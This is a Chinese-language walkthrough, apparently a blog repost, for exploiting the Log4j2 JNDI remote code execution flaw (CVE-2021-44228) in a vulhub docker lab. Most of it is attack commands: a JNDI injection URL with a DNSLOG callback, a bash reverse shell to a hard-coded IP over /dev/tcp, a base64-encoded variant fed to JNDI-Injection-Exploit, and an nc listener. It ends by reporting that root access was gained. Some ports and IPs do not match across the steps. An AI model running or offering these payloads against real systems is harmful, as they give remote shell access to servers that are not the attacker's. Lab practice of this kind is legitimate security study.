当前位置: 首页 > news >正文

Log4j2漏洞攻略

log4j2 是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末 log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。

1.执行以下命令启动靶场环境并在浏览器访问

# 启动命令

systemctl start docker

cd vulhub/log4j/CVE-2021-44228

docker-compose up -d

2. 在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注入的效果

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.peuuh8.dnslog.c n}

 3.准备反弹Shell,JNDI-Injection-Exploit 下载并构造PayLoad如下

#反弹shell

bash -i >& /dev/tcp/172.16.1.159/8088 0>&1

#反弹Shell-base64加密

最终Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,Ym FzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xODYvNjk2OSAwPiYx}|{base64,-d}|{bash, -i}" -A "攻击者IP"

-C后⾯的参数是要执⾏的命令以及编码⽅式,-A后⾯就是对应ip地址

 4.在另一个终端开启监听并在刚才的网站去进行JNDI注入

# 服务器监听

nc -lvvp 8898

# VPS防⽕墙开启端⼝

8180/1099/1389

 5.网页被重定向到了我们的恶意类⽹址

6.在监控终端查看shell是否弹回来且用whoami命令查看权限,发现已经成功获取到root权限 

http://www.dtcms.com/a/69096.html

相关文章:

  • H.264视频编解码:从原理到应用
  • 【日志队列】log日志实时写入队列,流式输出
  • 【Java 基础(人话版)】进制转换
  • 【区块链】以太坊
  • 什么是云原生?
  • 前端主题切换架构设计方案
  • 蓝耘携手通义万象 2.1 图生视频:开启创意无限的共享新时代
  • 【软设中级】软件设计师中级专题复习:(专题二)程序语言部分
  • 从AI产品经理视角深度剖析Manus:技术、定位与商业化的三重跃迁
  • 如何快速检测光模块内部光纤裂纹?
  • C++ primer plus 类和对象下
  • 从头开始学C语言第二十三天——指针概念
  • MFC控件按钮的使用
  • 深入浅出消息队列 (MQ)
  • Java 断言(Assert)机制
  • pgAdmin 4汉化,设置界面为中文
  • 机器学习(七)
  • 太速科技-636-基于FMC的Kintex XCKU060高性能PCIe载板
  • LVI-SAM、VINS-Mono、LIO-SAM算法的阅读参考和m2dgr数据集上的复现(留作学习使用)
  • python广度优先搜索(BFS)算法
  • 16.使用读写包操作Excel文件:XlsxWriter 包
  • 《灵珠觉醒:从零到算法金仙的C++修炼》卷三·天劫试炼(47)乾坤图演路径 - 欧拉路径(Hierholzer 算法)
  • 完善机器人:让 DeepSeek 使用Vue Element UI快速搭建 AI 交互页面
  • vue埋点
  • LinuX---进程线程类
  • DFS深度优先搜索
  • 完善机器人:让 DeepSeek 生成 API 接口,并在网页上调用
  • 浅谈数据分析及数据思维
  • Android/AOSP源码编译错误:TEMPORARY_DISABLE_PATH_RESTRICTIONS
  • Linux从零搭建Dify智能体平台(包含网络代理、docker安装、docker镜像地址设置)